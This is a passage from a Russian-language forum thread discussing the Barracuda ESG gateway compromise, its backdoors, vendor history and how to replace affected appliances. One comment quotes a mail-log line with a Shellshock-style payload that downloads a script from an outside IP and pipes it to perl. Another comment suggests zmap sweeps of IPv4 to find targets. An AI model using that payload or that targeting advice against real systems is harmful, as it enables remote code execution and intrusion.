Проблема в том что он удобен еще и для прострела пяток не сильно очевидными способами, когда вы просто потеряли flow и сделали что-то не то, даже и не заметив это. Иногда и при вон том самом - отслеживать и тем более автоматически анализировать корректность этих действ и намерений кодера при этом малореально. Данная конструкция крайне опасна в аспекте провоцирования багов и сильно усложняет анализ (и въезд других кодеров в код). Именно поэтому ее и не рекомендуют.

> Синглтоны - это норма: большинство классов нужно только в одном экземпляре.

Я все понимаю, но зачем тогда вообще заводить классы? :)

> В глобальной переменной удобно хранить логгер.

А также какие-то ну вот реально глобальные вещи. Типа, скажем, общей конфигурации программы, которая доступается буквально отовсюду. Просто этого должен быть необходимый минимум и ни битом более. Потому что скрытые параметры вне формальных деклараций что вон та штука использует в общем случае не рулят, а попытка поменять что-то вон в этом глобальном там может оказаться довольно мучительна когда половина кода внезапно развалится.

> называть переменные a1, a2, a3,

В этом месте вас проклянет следующий майнтайнер этого кода...

> и мешать snake_case с CamelCase и lowerCamelCase.

А в этом месте вас линчуют коллеги/коммитеры/майнтайнеры и все кто будет иметь дело с этим кодом. Потому что вы сломали их ожидания - и обрекли на множество дурных багов на ровном месте. Такой код может быть проще списать в утиль и переписать заново, он может оказаться непригоден к майнтенансу.

> И таких примеров - миллионы. Всегда нужно думать своей головой.

Особенно в упомянутых случаях. Потому что их маркировали как проблемные по вполне конкретным причинам.

Ответить | Правка | Наверх | Cообщить модератору

11. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Аноним (11), 11-Июн-23, 10:36 
>Оборудование будет заменено бесплатно
Ответить | Правка | Наверх | Cообщить модератору

19. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (19), 11-Июн-23, 11:26 
Как "нейгочип" в DEHR?
Ответить | Правка | Наверх | Cообщить модератору

21. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  –1 +/
Сообщение от n00by (ok), 11-Июн-23, 12:03 
> Бэкдор SALTWATER был оформлен в виде модуля mod_udp.so
> к SMTP-процессу bsmtpd

LD_PRELOAD?

Зато место на диске сэкономили!

Ответить | Правка | Наверх | Cообщить модератору

23. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (22), 11-Июн-23, 12:08 
Email InSecurity gateway однако получился. Ну, что, кто еще из безопасников хочет нанять дешевых раджей разбирающихся в иб как свиньи в апельсинах? :)
Ответить | Правка | Наверх | Cообщить модератору

25. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (4), 11-Июн-23, 12:10 
Что теперь эту компанию оштрафуют на жесткие 60 000 рублей? Да пофиг можно не то что нанять дешевых, а вообще всех разогнать ничего не изменится.
Ответить | Правка | Наверх | Cообщить модератору

31. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Самый Лучший Гусь (?), 11-Июн-23, 13:17 
В очередной раз "кровавый энтерпрайз" показал что никакой он не кровавый а от другой всем извесной субстанции
Ответить | Правка | Наверх | Cообщить модератору

34. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Атон (?), 11-Июн-23, 13:59 
Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку, с которой все началось, делали вообще тиктокеры на удаленке.
Ответить | Правка | Наверх | Cообщить модератору

41. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +3 +/
Сообщение от Самый Лучший Гусь (?), 11-Июн-23, 16:03 
> Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку,
> с которой все началось, делали вообще тиктокеры на удаленке.

У них в подвале:
> © 2003 - 2023 Barracuda Networks, Inc.

Уже весьма немолодая. Хардварный шлюз для электронной почты это не может быть не энтерпрайз. Нормальному человеку такое даже в голову не прийдёт.

Ответить | Правка | Наверх | Cообщить модератору

44. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  –2 +/
Сообщение от Атон (?), 11-Июн-23, 17:35 
>> Какой же это энтерпрайз? это молодая динамично развивающаяся компания, а 5 прошивку,
>> с которой все началось, делали вообще тиктокеры на удаленке.
> У них в подвале:
>> © 2003 - 2023 Barracuda Networks, Inc.
> Уже весьма немолодая. Хардварный шлюз для электронной почты это не может быть
> не энтерпрайз. Нормальному человеку такое даже в голову не прийдёт.

Не фирма-однодевка, но молодая.
5 версия вышла в 2017. 9 в 2023. грубо говоря, до 2011 этот стартап искал инвесторов и не функционировал.
тарифные планы у них начинаются с 100 ящиков, это SMB сегмент.

кровавый энтерпрайз начинается от 50 лет и сумм на 2 порядка выше.

Ответить | Правка | Наверх | Cообщить модератору

46. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 11-Июн-23, 18:15 
Ну щассс... сколько там лет ironport до покупки его циской?

Изобрели идею, успешно провернули, набрали на ipo, собрали бабла, продали подорого... Правда, в отличие от этих, они не кламав (или что там?) использовали, конечно.

Унутре, кстати, фря. (Ну и неонка, етосамое.)

И ничего, лавки из top50 юзают... куда им деваться-то с подводной лодки.

Ответить | Правка | Наверх | Cообщить модератору

50. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Атон (?), 11-Июн-23, 19:03 
> Ну щассс... сколько там лет ironport до покупки его циской?

это им очень совпало с периодом когда у эффективных менеджеров возникла мода скупать стартапы а не пилить свои велосипеды с нуля.

> И ничего, лавки из top50 юзают... куда им деваться-то с подводной лодки.

маркетинг циски может зимой продать чукчам снег. а уж незаметно впарить клиентам пакетом "на сдачу" от годовой подписки при очередном обновлении линейки еще один продукт.

Ответить | Правка | Наверх | Cообщить модератору

51. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Атон (?), 11-Июн-23, 19:10 
> Ну щассс... сколько там лет ironport до покупки его циской?
> Изобрели идею, успешно провернули, набрали на ipo, собрали бабла, продали подорого... Правда,
> в отличие от этих, они не кламав (или что там?) использовали,
> конечно.

а зачем циска поглощала ClamAV и Snort

Ответить | Правка | К родителю #46 | Наверх | Cообщить модератору

77. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 00:13 
да хз - может избавлялась от неконтролируемых конкурентов, может назло врагам, а может деваться некуда - я уж и не помню, что там штатно в ironport, по-моему чуть ли не sophos был (то есть не свое и платить ему за каждое обновление)

Это про кламдрянь, разумеется. К snort вопросов нету, он был уж как минимум не хуже штатной цискиной ids коробки (тоже, разумеется, redhat внутри, но тогда там какой-то унылый собственный трэш крутился) - если ему правила кто-то будет писать. А прикованных индусов у цисок как раз - horde.

Но главная идея ironport не антивирус ни разу, а relay reputation network, ну и типовой набор для юзверей (правда феерически неудобный и все к нему писали свои междумордия) чтоб почту не в /dev/null отправлял и ее в конечном итоге можно было как-то извлечь.

У этих, видимо, примерно такое же.

Ответить | Правка | Наверх | Cообщить модератору

82. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от _ (??), 12-Июн-23, 04:50 
> Но главная идея ironport не антивирус ни разу, а relay reputation network
> У этих, видимо, примерно такое же.

Повторяю большими красными буквами, что Barrakuda что IronPort - личензировали антиспам у одной гордой но маленькой компании :) С репутачиями и 12 стэйжами навески скора. Iron-ы SCORE (hardened FreeBSD 4.11) тоже купили. Что оставили - не в курсе.

Впрочем этот бизнесс кончилося в 2009: их купили китайцы прикидывающиеся американцами (watchguard). Предлагали перевезти в Сиэтл, зряплату правда ни сказать чтоб приличную предложили - но я вежливо отказался. Они все на пистоне(!!!!!)  переписывать начали, я решил уж лучше в телекомы подамся. Ну и подался :)

14 years ago, on one far, far, far galaxy ... (C)
:)

Ответить | Правка | Наверх | Cообщить модератору

85. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 08:27 
> - но я вежливо отказался. Они все на пистоне(!!!!!)  переписывать
> начали, я решил уж лучше в телекомы подамся. Ну и подался

вот, была бы непыльная работенка на всю жизнь, переписывать с пистона на пистон по мере планового устаревания пистонов.

А у тех кто не переписывал 20 лет - вишь, внутри qx случайно забрался какой-то чужой, неправильный кот и в тапки нагадил.

Интересно, у ironport тоже такой же?

Ответить | Правка | Наверх | Cообщить модератору

120. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (114), 12-Июн-23, 23:06 
> вот, была бы непыльная работенка на всю жизнь, переписывать с пистона на
> пистон по мере планового устаревания пистонов.

Работяги в твиттере тоже так думали. Пришел Маск и вышиб 80% этих самых, обнаружив что оказывается и так все неплохо работает.

У остальных с этого шоу конкретно подгорело, менеджеры удивленно пробурчали "а что, так можно было?!" - и уволили еще 200К таких счастливчиков из разных фирм. И еще небось столько же уволят, по мере раздупления.

Ответить | Правка | Наверх | Cообщить модератору

33. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от анонимус (??), 11-Июн-23, 13:49 
Не удивлюсь, если там внутри какой-нибудь amavis (который как раз на перле)
Ответить | Правка | Наверх | Cообщить модератору

36. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Анонимус другой (?), 11-Июн-23, 14:36 
>Проблема была вызвана отсутствием должной проверки имён файлов внутри tar-архивов, передаваемых в почтовом вложении, и позволяла выполнить произвольную команду в системе с повышенными привилегиями, обойдя экранирование при выполнении кода через Perl-оператор "qx".

Вероятнее всего связка ClamAV + SpamAssassin

Ответить | Правка | Наверх | Cообщить модератору

38. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (38), 11-Июн-23, 15:01 
Спамооборона
Ответить | Правка | Наверх | Cообщить модератору

39. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Аноним (39), 11-Июн-23, 15:27 
Jun 11 12:54:23 mg16 postfix/smtpd[10418]: warning: Illegal address syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; }; wget -qO - 68.235.39.225/ipax|perl>

нашел в логах эксплоит :)

Ответить | Правка | Наверх | Cообщить модератору

42. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Всем Анонимам Аноним (?), 11-Июн-23, 17:14 
Коментарии на испанском
Ответить | Правка | Наверх | Cообщить модератору

122. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (114), 12-Июн-23, 23:21 
А что это вообще за дуршлаг?
Например 68.235.39.225/e/ работает и вываливает какой-то забавный хлам.
Ответить | Правка | К родителю #39 | Наверх | Cообщить модератору

52. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +2 +/
Сообщение от Аноним (52), 11-Июн-23, 19:17 
Вот что бывает когда АНБ США набирает себе сотрудников для баланса гендерной нейтральности. Страдает профессионализм структуры. А былые времена уязвимость замаскировали бы так что лет 20 не нашли.
Ответить | Правка | Наверх | Cообщить модератору

56. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Liinemail (ok), 11-Июн-23, 20:08 
То, что они не могут пофиксить прошивку без замены устройства - это прям мегафакап для всей их архитектуры. CTO с командой можно гнать ссаными тряпками без выходного пособия. Так-то баги у всех бывают, но если ты не можешь пофиксить это без гемора для клиента - не надо тебе заниматься этим делом, выбери другую профессию.
Ответить | Правка | Наверх | Cообщить модератору

59. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (20), 11-Июн-23, 20:57 
CTO - это профессия грести деньги, а не менять прошивки. Вот ты его прогнал в другую отрасль, он пойдёт и тоже там зафакапит, увеличив личный счёт на пару лямов. В третий раз придёт воспитывать твоих детей, он же умеет.
Ответить | Правка | Наверх | Cообщить модератору

67. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:04 
Ды почему факап. Есть base OS, есть набор пакетов собственно аппликухи - "фирмварь". Base OS удалённо если и обновляется, то очень ограниченно. Дальше - как ты будешь чинить порутованную операционку удалённо? Она тебе этого может просто не дать сделать. Трахаться с IPMI и заливкой здоровенного образа через VCD/VUSB - это очень долго, проще выслать новую железку. Ну и да, где гарантии, что руткит собственно в фирмварь платы не залез, с утечками всяких интелоключей тоже не исключено. Лучше таки заменить целиком.
Ответить | Правка | К родителю #56 | Наверх | Cообщить модератору

68. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:05 
// IPMI для тяжёлых случаев у них есть, кстате, но, видимо, решили геморроев на ровном месте не разводить
Ответить | Правка | Наверх | Cообщить модератору

90. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 11:11 
> // IPMI для тяжёлых случаев у них есть, кстате, но, видимо, решили
> геморроев на ровном месте не разводить

у них может и установочного образа-то не быть, нафига он нужен, чтоб потырили и своих хакокуд наплодили? Разливают поди все дискдупликатором каким еще до монтажа в коробку.
А если и есть образ, то под десятью замками. А то каждый так сможет.


Ответить | Правка | Наверх | Cообщить модератору

104. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 12-Июн-23, 17:57 
Деплойный образ-то скорее всего есть, особенно с учётом того, что у них даже виртуалки мать-мать чем-то внутри отличаются, download для каждого клиента свой.
Ответить | Правка | Наверх | Cообщить модератору

74. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Liinemail (ok), 11-Июн-23, 23:50 
> Дальше - как ты будешь чинить порутованную операционку удалённо? Она тебе этого
> может просто не дать сделать.

Ну мил человек, чай не в 20-м веке-то живем. Полно технологий и подходов уже известно, тот же Dual BIOS. А вообще в Баракуде прям просится Hardened Linux, со всеми плюшками - политиками доступа, изоляцией процессов, файловых систем, уровнями доступа и прочие сладостные для уха безопасника слова.

Ответить | Правка | К родителю #67 | Наверх | Cообщить модератору

91. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 11:15 
> Ну мил человек, чай не в 20-м веке-то живем. Полно технологий и
> подходов уже известно, тот же Dual BIOS. А вообще в Баракуде

нет гарантии что он не dual pwned, нужно об этом думать на этапе проектирования, выбирать плату с поддержкой и потом бороться с производителем решившим именно ее снять потому что перестали выпускать вооон тот мелкий преобразователь напряжений который так здорово лег в схему.

Зачем закладываться на такие жуткие факапы как этот? Слуцилась? Ну поменяли коробки, и клиенту так спокойней (все равно они наверняка на саппорт контракте с заменой 5/7/24). Заодно убедиться что ничего не забыли и помимо трех троянцев нет четвертого еще через какую-то интересную технологическую отверстию.

Ответить | Правка | Наверх | Cообщить модератору

93. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Liinemail (ok), 12-Июн-23, 12:12 
> Ну поменяли коробки

А-ха-ха, "поменяли коробки". Поменять коробки можно для кошки. А замена инфраструктурных элементов крупной компании - это отдельный геморой для всего IT-отдела. И вряд ли эту Баракуду будут еще закупать. Никому геморой не нравится, знаете ли..

Ответить | Правка | Наверх | Cообщить модератору

94. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:11 
В чём проблема замены-то? Одну железку почистить и снять, одну поставить и включить в кластер.
Делов ровно на час. Если железок несколько и кластер большой - можно за этот же час десяток-другой убрать-добавить, всё упирается только в скорость прокликивания :D
Ответить | Правка | Наверх | Cообщить модератору

97. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Liinemail (ok), 12-Июн-23, 14:17 
> В чём проблема замены-то? Одну железку почистить и снять, одну поставить и
> включить в кластер.

Что значит - "одну"? У вас все железки скомпроментированы. Их надо разом все выключать и заново конфигурить.

Ответить | Правка | Наверх | Cообщить модератору

98. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:23 
Чо? Новые железки уязвимости не имеют.
Да, есть некоторое опасение, что через кластеринг может тоже просочиться - но это в целом малореально, учитывая что кластеринг только синхронизацию элементов конфига из себя представляет.
Ответить | Правка | Наверх | Cообщить модератору

111. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Liinemail (ok), 12-Июн-23, 19:41 
> Чо? Новые железки уязвимости не имеют.
> Да, есть некоторое опасение, что через кластеринг может тоже просочиться - но
> это в целом малореально, учитывая что кластеринг только синхронизацию элементов конфига
> из себя представляет.

Я так понимаю, что основы безопасности сетей и серверов Вам не очень хорошо знакомы?
Если хоть одна железка скомпроментирована - это уже повод проводить полный аудит по безопасности всех серверов и железок, что были в той сети. И никто не будет дожидаться, пока приедет новая баракуда, скомпроментированные будут просто отключать как можно быстрее. И опять же, нет гарантии, что чудики все починили и других подобные багов там не осталось.

Ответить | Правка | Наверх | Cообщить модератору

112. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 12-Июн-23, 22:44 
Да. Обязательно выключить всё и полгода разбираться. Клиенты подождут, главное - аудит.
Реальность от мира розовых поней отличается очень сильно. Сначала меняем-затыкаем, потом разбираемся с хвостами.
Ответить | Правка | Наверх | Cообщить модератору

116. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +1 +/
Сообщение от Tron is Whistling (?), 12-Июн-23, 22:52 
И да, расскажи нам, благородный дон, что ты собрался аудитить в закрытой железке?
Ответить | Правка | К родителю #111 | Наверх | Cообщить модератору

117. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 12-Июн-23, 22:53 
Я злой сегодня.

В "той сети" - это в какой? У меня допустим оно в паблике стоит. Будешь всю 0.0.0.0/0 и ::/0 аудитить? Успехов.

Ответить | Правка | К родителю #111 | Наверх | Cообщить модератору

121. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (114), 12-Июн-23, 23:10 
> Будешь всю 0.0.0.0/0 и ::/0 аудитить? Успехов.

Я тоже не прочь увидеть как кого-то чрезмерно самоуверенного заслуженно трахнут - поэтому вот небольшой хинт атакуюшим: перебор каким-нибудь zmap'ом всего IPv4 даже на на гигабите занимает менее суток. Поэтому аудит всего /0 - внезапно, вариант.

Ответить | Правка | Наверх | Cообщить модератору

124. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 13-Июн-23, 09:19 
АУДИТ, а не перебор zmap'ом. Вот сразу и видно, кто с чем знаком.
Ответить | Правка | Наверх | Cообщить модератору

127. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (114), 13-Июн-23, 10:24 
> АУДИТ, а не перебор zmap'ом. Вот сразу и видно, кто с чем знаком.

Ну так сначала Zmap'ом находятся "promising targets" - в том числе и "все что похоже на барракуду в интернете". А потом им можно устроить уже более предментный "аудит" :). И вот откуда такая ломовая уверенность что вы одним из этих target'ов не будете, если на публичном айпи голым задом вывесить - кто б его знает.

Ну а уж более информированый атакующий которому не вломак разобраться кто вы и откуда примерно лезете - сможет и как минимум конкретный AS прикинуть и там уже куда прицельнее гасить.

Ответить | Правка | Наверх | Cообщить модератору

129. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 13-Июн-23, 11:52 
А У Д И Т
Ответить | Правка | К родителю #127 | Наверх | Cообщить модератору

99. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:26 
Ладно, до конца подскажу :)
Выбирайте самый простой вариант: конфигурим одну новую заранее. Далее включаем ей в кластер все остальные новые, их конфигурация как раз и упирается в скорость прокликивания, 99% конфига придёт с кластера.
Далее в течение минуты перекидываем балансер на новые железки, а старые гасим.
Так понятнее?
Ответить | Правка | К родителю #97 | Наверх | Cообщить модератору

107. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 19:01 
обычная работа. Еще и по некритичному сервису, пол-часа без почты или резервным релеем где-то в щебенях поднятым специально для этой цели почти любая контора может пережить.

А если для вас это страшный и ужасный геморрой, одну коробку из стойки выкинуть, другую закатать и, может быть, накатить конфиг если кластер уже не кластер а рассадник троянов (надеюсь конфиг у вас все же где-то был)  - можете в пресейлы подаваться. Потому что начальство скоро кое о чем догадается.

Ответить | Правка | К родителю #93 | Наверх | Cообщить модератору

62. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (62), 11-Июн-23, 22:39 
А могли поставить съемный spi чип в дипоском корпусе в распаянную на плате кроватку установить.
Ответить | Правка | Наверх | Cообщить модератору

66. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 11-Июн-23, 23:01 
Какой блджад SPI чип. Какая кроватка. Там обычный x86 внутри. С SSD/HDD и поэтессами.
А кровати переставлять вообще поздно в этом случае.

Меняют потому, что степень внедрения не понятна, а фирмварь полного образа ОС из себя не представляет.

Ответить | Правка | Наверх | Cообщить модератору

76. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (76), 11-Июн-23, 23:59 
>фирмварь полного образа ОС из себя не представляет.

Чего она не представляет?

Если там обычный hdd/ssd, пройтись по ним обычным dd, залив образ, который предоставит контора. Нет, для тех у кого лапки, можно и прислать устройства вендору, как элемент маркетинга ход стандарте, хорош и понятен.

Я уж подумал, там всё серьёзно, что-то на уровне пробоин efi.

Ответить | Правка | Наверх | Cообщить модератору

95. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:12 
Ну давай, пройдись мне dd по железке, которая не даёт тебе полноценной консоли. А открыть корпус = слететь с гарантии. Это тебе не твой гаражик с ржавой шахой.
Ответить | Правка | Наверх | Cообщить модератору

137. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (137), 15-Июн-23, 00:16 
Тоже мне бентли нашлась, лол.
ПС: почистил и промыл карб шахи - и пошёл резать пятаки и давать угла.
Ответить | Правка | Наверх | Cообщить модератору

100. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 12-Июн-23, 15:05 
Ну там реально чего угодно может быть после порутания.
Но обычным dd по ним никак не пройтись, железка вендорская, консоли нет.
Ответить | Правка | К родителю #76 | Наверх | Cообщить модератору

103. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  –1 +/
Сообщение от Аноним (47), 12-Июн-23, 17:03 
Зачем? Дополнительные компоненты, кастомное железо, необходимость вскрывать корпус для замены, ESD-защита, квалификация персонала, и, главное, время. Раз уж апплаенс надо из стойки вынимать, то проще новый туда вставить, чем SPI отвёрткой из кроватки выковыривать. UPS доставит новую железку в течение 24 часов. Через 48 часов твой ещё чуть тёплый рутованный гейт будет у вендора в лаборатории на стенде ждать инженеров для анализа. А через пару месяцев может даже будет стоять в другой стойке у другого клиента после перепрошивки.
Ответить | Правка | К родителю #62 | Наверх | Cообщить модератору

84. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (84), 12-Июн-23, 08:18 
"Email Security Gateway"
Это файрвол отдельно для почтового сервера, а не для всей сети компании. Хотя у барракуд на странице компании гордо висит "91% of cyberattacks start with an email".
Зато честно, LOL. :)
TrustRadius Top Rated for 2023, 8.9/10 - просто топчик, верим ни разу не проплаченному рейтингу, угу.

"The vulnerability existed in a module which initially screens the attachments of incoming emails."
SALTWATER, SEASIDE - modules for the Barracuda SMTP daemon.
SMTP протокол изначально создавался в древние времена, когда вообще не предполагали злоупотребления, но для функционала и секьюрности навернули поверх дополнений, и это, разумеется, решив ряд вопросов, создало еще больше возможностей для проникновения.

SEASPY is an x64 ELF persistence backdoor.. monitoring traffic on port 25 (SMTP) and port 587.. path: /sbin/
Ай, молодцы, барракуды, мало им было проблем с SMTP, так еще и бэкдоры свои впихнули в дистр Linux.

решение "to obtain a new ESG virtual or hardware appliance."
Ну хоть если у кого этот файрвол для почтовика крутится на виртуалке, то "всего лишь" переустановить и настроить по-новой виртуалку, а не менять железку. (про версии для AWS/Azure барракуды молчат)

Ответить | Правка | Наверх | Cообщить модератору

92. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 11:17 
> решение "to obtain a new ESG virtual or hardware appliance."
> Ну хоть если у кого этот файрвол для почтовика крутится на виртуалке,
> то "всего лишь" переустановить и настроить по-новой виртуалку, а не менять

бэкапы конфига, извиняюсь за грубость, делать не принято? Ну пусть настроят, наверняка услуги настройщика тоже входят в саппорт. А контора недельку посидит без почты... зачем она...

> железку. (про версии для AWS/Azure барракуды молчат)

так пусть amazon переустанавливает, для того и брали ведь

Ответить | Правка | Наверх | Cообщить модератору

96. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Поле Name не забыто и не прощено (?), 12-Июн-23, 14:14 
Ды там кластеринг есть, 99% конфига синхронизируются. Если у кого-то железка одна - ну, ссзб.
Ответить | Правка | Наверх | Cообщить модератору

109. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 19:07 
> Ды там кластеринг есть, 99% конфига синхронизируются.

ну фиг знает, стоит ли синхронизироваться с зараженным кластером, но в целом тоже не должно быть особой проблемы восстановить конфиг первой из железок а остальное уже в спокойном режиме поштучно синхронизировать.

Ну а кто не может или не имел бэкапов конфигурации - того и не очень жаль.

Ответить | Правка | Наверх | Cообщить модератору

113. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 12-Июн-23, 22:46 
Не, синхронизироваться можно с новой машиной, образующей новый кластер. Процесс поднятия понимаемо ускоряется :)
Ответить | Правка | Наверх | Cообщить модератору

106. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (84), 12-Июн-23, 18:58 
ты вообще не понял масштаб кабздеца. Заражается ESG через бэкдор, подгружаются левые демоны SMTP, от EGS заражается почтовый сервак, который ESG по-идее защищает, и понеслось заражение через email всех кто в базе почтовика.
И тут вопрос, а КАК понять вообще КОГДА произошло заражение, т.е. какие бэкапы можнно спокойно накатывать на все?
А если там, эээ, инкубационный период и ты такой, о, 25 мая началась ненормальная активность, значит накатываем бэкапы от 24го. А заражение произошло на самом деле еще раньше. Только ты заменил EGS на новый, вычистил все серваки компании, десктопы клиентов, все, что в облаках, разослал всем кто в почтовой базе извинения-предупреждения, спал неделю по пару часиков урывками, и фигак, у тебя понеслось все по-новой, потому что бэкап, который должен быть норм, оказался тоже зараженный.
Так можно и работу потерять.
Ответить | Правка | К родителю #92 | Наверх | Cообщить модератору

108. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от пох. (?), 12-Июн-23, 19:05 
> ты вообще не понял масштаб кабздеца. Заражается ESG через бэкдор, подгружаются левые
> демоны SMTP, от EGS заражается почтовый сервак, который ESG по-идее защищает,

если у тебя почтовый сервер может чем-то там заразиться от совершенно несовместимой железки - тебе уже не надо так много работать, сходи проветрись.

> и понеслось заражение через email всех кто в базе почтовика.

чем заражение? В базе почтовика обычные пользователи, у них нет "qx"

> И тут вопрос, а КАК понять вообще КОГДА произошло заражение, т.е. какие
> бэкапы можнно спокойно накатывать на все?

бэкапы - чего? Бэкапы конфига можешь любые накатывать - это, чорд побери - КОНФИГ.

> Так можно и работу потерять.

да, с твоими талантами - легко.

Ответить | Правка | Наверх | Cообщить модератору

110. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Аноним (84), 12-Июн-23, 19:13 
выше я отметил про SMTP из ориг.статьи. А то "несовм.железка" и пошло-поехало домысливание.
"тебе уже не надо так много работать, сходи проветрись" - пошло советское хамство, переход на личности.
пох такой пох, разговор закончен.
Ответить | Правка | Наверх | Cообщить модератору

125. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от pofigist (?), 13-Июн-23, 09:56 
На счет конфигов - в современные конфиги некоторые умники очень любят встраивать поддержку скриптовых языков. То есть по факту мы имеем вместо старого, доброго тупого конфига - некий скрипт на sh/lua/PHP/etc...
А встроить в такой конфиг заразу - дело техники...
Ответить | Правка | К родителю #108 | Наверх | Cообщить модератору

132. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от _ (??), 13-Июн-23, 22:50 
Я Barracuda последний раз видел в 2015-6 году, на пямять - еЯ конфиг просто богомерзкий XML ... Не надо фантазий там где не надо.
Ответить | Правка | Наверх | Cообщить модератору

133. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от _ (??), 13-Июн-23, 22:52 
>ты вообще не понял масштаб кабздеца.

ORLY?! ;-)
>Заражается ESG через бэкдор, подгружаются левые демоны SMTP, от EGS заражается почтовый сервак, который ESG по-идее защищает, и понеслось заражение через email всех кто в базе почтовика.

Вот в этом месте - подробнее, с тех. деталями. Раскрой механизм дейста, ЫнжеНегище! :)

PS: Как думаете - сольётся?

Ответить | Правка | К родителю #106 | Наверх | Cообщить модератору

134. "Компрометация шлюзов Barracuda ESG, требующая замены оборудо..."  +/
Сообщение от Tron is Whistling (?), 13-Июн-23, 23:29 
Да фиг ли там раскрывать.
Заражается ESG, сканит сеть, ломает протухшую винду с сексченджем, начинает юзерам письма счастья рассылать (я ваш енженегр, загрузите вот этот файлик срочно иначе документы будут потеряны).
